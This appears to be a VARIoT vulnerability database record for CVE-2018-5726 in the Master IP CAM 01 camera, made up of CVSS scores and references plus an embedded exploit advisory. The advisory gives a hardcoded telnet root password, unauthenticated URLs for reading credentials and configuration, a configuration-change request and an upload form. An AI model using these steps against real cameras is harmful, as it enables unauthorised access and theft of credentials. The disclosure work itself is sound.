VAR-201801-1649
Vulnerability from variot - Updated: 2023-12-18 12:44MASTER IPCAMERA01 3.3.4.2103 devices allow remote attackers to obtain sensitive information via a crafted HTTP request, as demonstrated by the username, password, and configuration settings. MASTER IPCAMERA01 The device contains an information disclosure vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. MASTERIPCAMERA01 is an IP network camera product. An information disclosure vulnerability exists in the MASTERIPCAMERA013.3.4.2103 release. # Exploit Title: Master IP CAM 01 Multiple Vulnerabilities
Date: 17-01-2018
Remote: Yes
Exploit Authors: Daniele Linguaglossa, Raffaele Sabato
Contact: https://twitter.com/dzonerzy, https://twitter.com/syrion89
Vendor: Master IP CAM
Version: 3.3.4.2103
CVE: CVE-2018-5723, CVE-2018-5724, CVE-2018-5725, CVE-2018-5726
I DESCRIPTION
The Master IP CAM 01 suffers of multiple vulnerabilities:
[CVE-2018-5723] Hardcoded Password for Root Account
[CVE-2018-5724] Unauthenticated Configuration Download and Upload
[CVE-2018-5725] Unauthenticated Configuration Change
[CVE-2018-5726] Unauthenticated Sensitive Information Disclousure
II PROOF OF CONCEPT
[CVE-2018-5723] Hardcoded Password for Root Account
Is possible to access telnet with the hardcoded credential root:cat1029
[CVE-2018-5724] Unauthenticated Configuration Download and Upload
Download:
http://192.168.1.15/web/cgi-bin/hi3510/backup.cgi
Upload Form:
Unauthenticated Configuration Upload
[CVE-2018-5725] Unauthenticated Configuration Change
Change configuration:
http://192.168.1.15/web/cgi-bin/hi3510/param.cgi?cmd=sethttpport&-httport=8080
List of available commands here: http://www.themadhermit.net/wp-content/uploads/2013/03/FI9821W-CGI-Commands.pdf
[CVE-2018-5726] Unauthenticated Sensitive Information Disclousure
Retrieve sensitive information:
http://192.168.1.15/web/cgi-bin/hi3510/param.cgi?cmd=getuser
III REFERENCES
http://syrion.me/blog/master-ipcam/ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5723 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5724 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5725 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5726 http://www.themadhermit.net/wp-content/uploads/2013/03/FI9821W-CGI-Commands.pdf
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201801-1649",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "master ip camera01",
"scope": "eq",
"trust": 1.6,
"vendor": "barni",
"version": "3.3.4.2103"
},
{
"model": "master ipcamera01",
"scope": "eq",
"trust": 0.8,
"vendor": "barni carlo",
"version": "3.3.4.2103"
},
{
"model": "ipcamera01",
"scope": "eq",
"trust": 0.6,
"vendor": "master",
"version": "3.3.4.2103"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-02194"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-001499"
},
{
"db": "NVD",
"id": "CVE-2018-5726"
},
{
"db": "CNNVD",
"id": "CNNVD-201801-569"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:barni:master_ip_camera01_firmware:3.3.4.2103:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:barni:master_ip_camera01:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2018-5726"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Daniele Linguaglossa, Raffaele Sabato",
"sources": [
{
"db": "PACKETSTORM",
"id": "145935"
}
],
"trust": 0.1
},
"cve": "CVE-2018-5726",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"impactScore": 2.9,
"integrityImpact": "NONE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 5.0,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2018-5726",
"impactScore": null,
"integrityImpact": "None",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.9,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CNVD-2018-02194",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "VHN-135758",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:P/I:N/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 9.8,
"baseSeverity": "Critical",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2018-5726",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2018-5726",
"trust": 1.8,
"value": "CRITICAL"
},
{
"author": "CNVD",
"id": "CNVD-2018-02194",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201801-569",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULHUB",
"id": "VHN-135758",
"trust": 0.1,
"value": "MEDIUM"
},
{
"author": "VULMON",
"id": "CVE-2018-5726",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-02194"
},
{
"db": "VULHUB",
"id": "VHN-135758"
},
{
"db": "VULMON",
"id": "CVE-2018-5726"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-001499"
},
{
"db": "NVD",
"id": "CVE-2018-5726"
},
{
"db": "CNNVD",
"id": "CNNVD-201801-569"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "MASTER IPCAMERA01 3.3.4.2103 devices allow remote attackers to obtain sensitive information via a crafted HTTP request, as demonstrated by the username, password, and configuration settings. MASTER IPCAMERA01 The device contains an information disclosure vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. MASTERIPCAMERA01 is an IP network camera product. An information disclosure vulnerability exists in the MASTERIPCAMERA013.3.4.2103 release. # Exploit Title: Master IP CAM 01 Multiple Vulnerabilities\n# Date: 17-01-2018\n# Remote: Yes\n# Exploit Authors: Daniele Linguaglossa, Raffaele Sabato\n# Contact: https://twitter.com/dzonerzy, https://twitter.com/syrion89\n# Vendor: Master IP CAM\n# Version: 3.3.4.2103\n# CVE: CVE-2018-5723, CVE-2018-5724, CVE-2018-5725, CVE-2018-5726\n \nI DESCRIPTION\n========================================================================\nThe Master IP CAM 01 suffers of multiple vulnerabilities:\n \n# [CVE-2018-5723] Hardcoded Password for Root Account\n# [CVE-2018-5724] Unauthenticated Configuration Download and Upload\n# [CVE-2018-5725] Unauthenticated Configuration Change\n# [CVE-2018-5726] Unauthenticated Sensitive Information Disclousure\n \n \nII PROOF OF CONCEPT\n========================================================================\n \n## [CVE-2018-5723] Hardcoded Password for Root Account\n \nIs possible to access telnet with the hardcoded credential root:cat1029\n \n \n## [CVE-2018-5724] Unauthenticated Configuration Download and Upload\n \nDownload:\n \nhttp://192.168.1.15/web/cgi-bin/hi3510/backup.cgi\n \nUpload Form:\n \n### Unauthenticated Configuration Upload\n\u003cform name=\"form6\" method=\"post\" enctype=\"multipart/form-data\"\naction=\"cgi-bin/hi3510/restore.cgi\" \u003e\n\u003cinput type=\"file\" name=\"setting_file\" \u003e\n\u003cinput type=\"submit\" value=\"restore\" \u003e\n\u003c/form\u003e\n \n \n## [CVE-2018-5725] Unauthenticated Configuration Change\n \nChange configuration:\n \nhttp://192.168.1.15/web/cgi-bin/hi3510/param.cgi?cmd=sethttpport\u0026-httport=8080\n \nList of available commands here:\nhttp://www.themadhermit.net/wp-content/uploads/2013/03/FI9821W-CGI-Commands.pdf\n \n \n## [CVE-2018-5726] Unauthenticated Sensitive Information Disclousure\n \nRetrieve sensitive information:\n \nhttp://192.168.1.15/web/cgi-bin/hi3510/param.cgi?cmd=getuser\n \n \nIII REFERENCES\n========================================================================\nhttp://syrion.me/blog/master-ipcam/\nhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5723\nhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5724\nhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5725\nhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5726\nhttp://www.themadhermit.net/wp-content/uploads/2013/03/FI9821W-CGI-Commands.pdf\n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2018-5726"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-001499"
},
{
"db": "CNVD",
"id": "CNVD-2018-02194"
},
{
"db": "VULHUB",
"id": "VHN-135758"
},
{
"db": "VULMON",
"id": "CVE-2018-5726"
},
{
"db": "PACKETSTORM",
"id": "145935"
}
],
"trust": 2.43
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.scap.org.cn/vuln/vhn-135758",
"trust": 0.1,
"type": "unknown"
},
{
"reference": "https://vulmon.com/exploitdetails?qidtp=exploitdb\u0026qid=43693",
"trust": 0.1,
"type": "exploit"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-135758"
},
{
"db": "VULMON",
"id": "CVE-2018-5726"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2018-5726",
"trust": 3.3
},
{
"db": "PACKETSTORM",
"id": "145935",
"trust": 1.3
},
{
"db": "EXPLOIT-DB",
"id": "43693",
"trust": 1.2
},
{
"db": "JVNDB",
"id": "JVNDB-2018-001499",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201801-569",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2018-02194",
"trust": 0.6
},
{
"db": "VULHUB",
"id": "VHN-135758",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2018-5726",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-02194"
},
{
"db": "VULHUB",
"id": "VHN-135758"
},
{
"db": "VULMON",
"id": "CVE-2018-5726"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-001499"
},
{
"db": "PACKETSTORM",
"id": "145935"
},
{
"db": "NVD",
"id": "CVE-2018-5726"
},
{
"db": "CNNVD",
"id": "CNNVD-201801-569"
}
]
},
"id": "VAR-201801-1649",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-02194"
},
{
"db": "VULHUB",
"id": "VHN-135758"
}
],
"trust": 1.7
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-02194"
}
]
},
"last_update_date": "2023-12-18T12:44:12.480000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top Page",
"trust": 0.8,
"url": "http://www.barni.it/"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-001499"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-200",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-135758"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-001499"
},
{
"db": "NVD",
"id": "CVE-2018-5726"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 3.3,
"url": "http://syrion.me/blog/master-ipcam/"
},
{
"trust": 1.3,
"url": "https://www.exploit-db.com/exploits/43693/"
},
{
"trust": 1.2,
"url": "https://packetstormsecurity.com/files/145935/master-ip-cam-01-hardcoded-password-unauthenticated-access.html"
},
{
"trust": 0.9,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-5726"
},
{
"trust": 0.9,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-5726"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/200.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "http://192.168.1.15/web/cgi-bin/hi3510/param.cgi?cmd=getuser"
},
{
"trust": 0.1,
"url": "https://twitter.com/syrion89"
},
{
"trust": 0.1,
"url": "http://www.themadhermit.net/wp-content/uploads/2013/03/fi9821w-cgi-commands.pdf"
},
{
"trust": 0.1,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-5723"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-5725"
},
{
"trust": 0.1,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-5725"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-5724"
},
{
"trust": 0.1,
"url": "http://192.168.1.15/web/cgi-bin/hi3510/param.cgi?cmd=sethttpport\u0026-httport=8080"
},
{
"trust": 0.1,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-5724"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-5723"
},
{
"trust": 0.1,
"url": "https://twitter.com/dzonerzy,"
},
{
"trust": 0.1,
"url": "http://192.168.1.15/web/cgi-bin/hi3510/backup.cgi"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-02194"
},
{
"db": "VULHUB",
"id": "VHN-135758"
},
{
"db": "VULMON",
"id": "CVE-2018-5726"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-001499"
},
{
"db": "PACKETSTORM",
"id": "145935"
},
{
"db": "NVD",
"id": "CVE-2018-5726"
},
{
"db": "CNNVD",
"id": "CNNVD-201801-569"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2018-02194"
},
{
"db": "VULHUB",
"id": "VHN-135758"
},
{
"db": "VULMON",
"id": "CVE-2018-5726"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-001499"
},
{
"db": "PACKETSTORM",
"id": "145935"
},
{
"db": "NVD",
"id": "CVE-2018-5726"
},
{
"db": "CNNVD",
"id": "CNNVD-201801-569"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-01-30T00:00:00",
"db": "CNVD",
"id": "CNVD-2018-02194"
},
{
"date": "2018-01-16T00:00:00",
"db": "VULHUB",
"id": "VHN-135758"
},
{
"date": "2018-01-16T00:00:00",
"db": "VULMON",
"id": "CVE-2018-5726"
},
{
"date": "2018-02-21T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-001499"
},
{
"date": "2018-01-17T03:33:33",
"db": "PACKETSTORM",
"id": "145935"
},
{
"date": "2018-01-16T22:29:00.443000",
"db": "NVD",
"id": "CVE-2018-5726"
},
{
"date": "2018-01-17T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201801-569"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-01-30T00:00:00",
"db": "CNVD",
"id": "CNVD-2018-02194"
},
{
"date": "2018-02-05T00:00:00",
"db": "VULHUB",
"id": "VHN-135758"
},
{
"date": "2018-02-05T00:00:00",
"db": "VULMON",
"id": "CVE-2018-5726"
},
{
"date": "2018-02-21T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-001499"
},
{
"date": "2018-02-05T20:07:10.163000",
"db": "NVD",
"id": "CVE-2018-5726"
},
{
"date": "2018-01-17T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201801-569"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201801-569"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "MASTER IPCAMERA01 Information disclosure vulnerability in devices",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-001499"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "information disclosure",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201801-569"
}
],
"trust": 0.6
}
}
Loading…
Loading…
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.
Loading…
Loading…